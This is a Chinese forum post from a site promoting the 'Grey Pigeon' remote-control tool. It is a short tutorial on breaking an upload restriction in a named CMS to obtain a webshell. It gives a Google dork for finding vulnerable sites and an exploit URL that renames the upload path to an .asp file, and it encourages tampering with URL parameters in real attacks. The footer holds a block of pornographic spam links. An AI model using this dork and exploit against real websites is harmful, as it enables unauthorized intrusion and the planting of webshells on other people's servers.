灰鴿子遠(yuǎn)程控制軟件

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 16195|回復(fù): 0
打印 上一主題 下一主題

修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載www.dumiaotech.com

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2013-2-3 14:12:16 | 只看該作者 回帖獎(jiǎng)勵(lì) |倒序?yàn)g覽 |閱讀模式
修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載


大家可能都看見過這樣的漏洞,這里以瘋子的嘉友科技cms上傳漏洞為例。

谷歌關(guān)鍵字:inurl:newslist.asp?NodeCode=   灰鴿子使用教程灰鴿子下載exp:
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上傳目錄是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出對參數(shù)PicPath進(jìn)行了修改,
這種漏洞主要是存在文件名或者路徑過濾不嚴(yán),在實(shí)戰(zhàn)中多多觀察url中的參數(shù),可以嘗試進(jìn)行修改數(shù)據(jù)。

評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復(fù)

使用道具 舉報(bào)

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

Archiver|手機(jī)版|小黑屋|灰鴿子遠(yuǎn)程控制軟件|灰鴿子遠(yuǎn)程控制軟件 ( 魯ICP備14000061號(hào)-4 )

GMT+8, 2025-3-13 03:08 , Processed in 0.093015 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復(fù) 返回頂部 返回列表
主站蜘蛛池模板: 久久成人无码国产免费播放| 亚洲国产a∨无码中文777| 日产无码1区2区在线观看| 国产精品无码一本二本三本色| yy111111少妇影院里无码| 久久久久亚洲AV无码永不| 国产日韩精品无码区免费专区国产| 人妻丰满AV无码久久不卡| 国产亚洲精久久久久久无码AV| 一本天堂ⅴ无码亚洲道久久| 国产午夜激无码av毛片| 亚洲综合无码无在线观看| 国产AV无码专区亚汌A√| 国产精品白浆在线观看无码专区| 蜜桃臀无码内射一区二区三区 | 午夜福利av无码一区二区| 免费无码又爽又高潮视频| 无码丰满熟妇juliaann与黑人| 亚洲情XO亚洲色XO无码| 亚洲精品无码成人片在线观看 | 国模无码人体一区二区| 五十路熟妇高熟无码视频| 2019亚洲午夜无码天堂| 无码AV天堂一区二区三区| 久久伊人中文无码| 亚洲男人在线无码视频| 国产精品无码MV在线观看| 日本精品人妻无码免费大全 | 国产成人无码精品久久久性色| 丰满少妇被猛烈进入无码| 久久久久久99av无码免费网站 | 日韩精品无码区免费专区| 亚洲综合无码一区二区痴汉| 亚洲youwu永久无码精品| 亚洲成av人片天堂网无码】| 久久无码av亚洲精品色午夜| 在线观看无码的免费网站| 色综合久久久无码中文字幕波多| 精品无码成人网站久久久久久 | av潮喷大喷水系列无码| 高清无码v视频日本www|